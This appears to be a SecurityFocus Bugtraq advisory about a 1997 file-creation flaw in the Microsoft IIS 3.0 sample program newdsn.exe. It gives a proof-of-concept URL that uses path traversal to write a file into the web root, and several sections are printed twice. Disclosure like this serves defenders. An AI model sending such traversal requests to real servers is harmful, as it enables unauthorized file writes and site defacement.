Microsoft IIS 3.0 newdsn.exe File Creation Vulnerability
BID:1818
Info
Microsoft IIS 3.0 newdsn.exe File Creation Vulnerability
| Bugtraq ID: | 1818 |
| Class: | Configuration Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Sep 25 1997 12:00AM |
| Updated: | Sep 25 1997 12:00AM |
| Credit: | This vulnerability was originally posted to ntbugtraq by Vytis Fedaravicius <[email protected]> on September 25, 1997. |
| Vulnerable: |
Microsoft IIS 3.0 |
| Not Vulnerable: | |
Discussion
Microsoft IIS 3.0 newdsn.exe File Creation Vulnerability
Microsoft IIS 3.0 came with a sample program, newdsn.exe, installed by default in the directory wwwroot/scripts/tools/. Execution of this program with a properly submitted URL could allow for remote file creation. The file created is a Microsoft Access Database, but can have any extension, including .html.
Microsoft IIS 3.0 came with a sample program, newdsn.exe, installed by default in the directory wwwroot/scripts/tools/. Execution of this program with a properly submitted URL could allow for remote file creation. The file created is a Microsoft Access Database, but can have any extension, including .html.
Exploit / POC
Microsoft IIS 3.0 newdsn.exe File Creation Vulnerability
http://vulnerable.site.comtools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2Fevil.html&newdb=CREATE_DB
http://vulnerable.site.comtools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2Fevil.html&newdb=CREATE_DB
Solution / Fix
Microsoft IIS 3.0 newdsn.exe File Creation Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
Microsoft IIS 3.0 newdsn.exe File Creation Vulnerability
References:
References: